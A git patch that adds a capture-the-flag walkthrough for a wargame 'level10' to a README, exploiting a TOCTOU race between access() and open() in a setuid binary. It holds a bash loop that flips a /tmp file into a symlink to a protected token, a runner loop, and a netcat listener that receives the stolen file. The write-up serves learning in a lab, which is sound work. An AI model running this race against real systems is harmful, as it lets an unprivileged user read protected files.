From 3cc389794997510660e61384de3b835f1a299fb9 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 22:39:23 +0100 Subject: [PATCH] Update README.mdx --- level10/README.mdx | 98 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 98 insertions(+) diff --git a/level10/README.mdx b/level10/README.mdx index fc0edc1..5b92e70 100644 --- a/level10/README.mdx +++ b/level10/README.mdx @@ -54,5 +54,103 @@ printf("Connecting to %s:6969 .. ", "localhost") = 32 ^^^^ 🟡 fflush(0xb7fd1a20Connecting to localhost:6969 .. ) = 0 ^^^^ 🟡 + +Idea +- it eems the program interacts with `localhiost:6969` +- we need a valid Host IP : + - `127.0.0.1` or an old trick + - `ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2` + +With correct IP: + +```b +> ./level10 /tmp/tmp $(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2) +Connecting to Localhost:6969 .. Connected! +Sending file .. wrote file! +```b + +Inspect w/ `ltrace`: + +```b +> ltrace ./level10 /tmp/tmp $(ifconfig | grep 'inet ' | awk 'NR==2 {print $2}' | cut -d ":" -f2) +__libc_start_main(0x80486d4, 3, 0xbffff7d4, 0x8048970, 0x80489e0 +access("/tmp/tmp", 4) = 0 +printf("Connecting to %s:6969 .. ", "Localhost") = 32 +fflush(0xb7fd1a20Connecting to Localhost:6969 .. ) = 0 +socket(2, 1, 0) = 3 +inet_addr("Localhost") = 0x0100007f +htons(6969, 1, 0, 0, 0) = 14619 +connect(3, 0xbffff71c, 16, 0, 0) = 0 +write(3, ".*( )*.\n", 8) = 8 +printf("Connected!\nSending file .. "Connected! +) = 27 +fflush(0xb7fd1a20Sending file .. ) = 0 +open("/tmp/tmp", 0, 010) = 4 + ^^^^^^^^ 🟡 here is where we hope to force our token in +read(4, "", 4096) = 0 +write(3, "", 0) = 0 +puts("wrote file!"wrote file! +) = 12 ++++ exited (status 12) +++ +``` + +Maybe it sends content of our file to `localhost:6969` +- try and intercept the content +- for that we use a 2nd terminal + +```b +# t1 +> nc -lk 6969 +``` +```b +# t2 +> ./level10 /tmp/tmp Localhost +> Connecting to Localhost:6969 .. Connected! +Sending file .. wrote file! +``` + +Figure out a way to make `./level10` to read the true `token`: +- exploit `access()`'s [TOCTOU](https://stackoverflow.com/questions/75587120/how-to-handle-toctou-problem-between-access-and-unlink) vulnerability +- design a file to do the following: + - when `access()` is called it checks the low-priority file + - after that, `./level10` should `open()` and `read()` the high-priotity one + +Solution: \ +to trick `access` we need a file that _alternates_ its type +- a file of our own permission level +- a symlink of the same name linked to `token` +- we need an alternation script + +`alternate.sh` +```b +#!/bin/bash + +t=/tmp/tmp + +#timeout 2s bash -c ' +while true; do + touch $t + rm -rf $t + ln -s /home/user/level10/token $t + rm -rf $t +done +#' ``` +- and a script to run `alternate` and `./level10` side by side + +`trylevel.s` +```b +#!/bin/bash + +#timeout 2s bash -c ' +while true; do + /home/user/level10/level10 /tmp/tmp 127.0.0.1 >/dev/null +done +#' +``` + +- and a 3rd script to unite two previous ones and `netcat` +```b +/tmp/alternate.sh 2>/dev/null & /tmp/runner.sh >/dev/null & nc -lk 6969 +```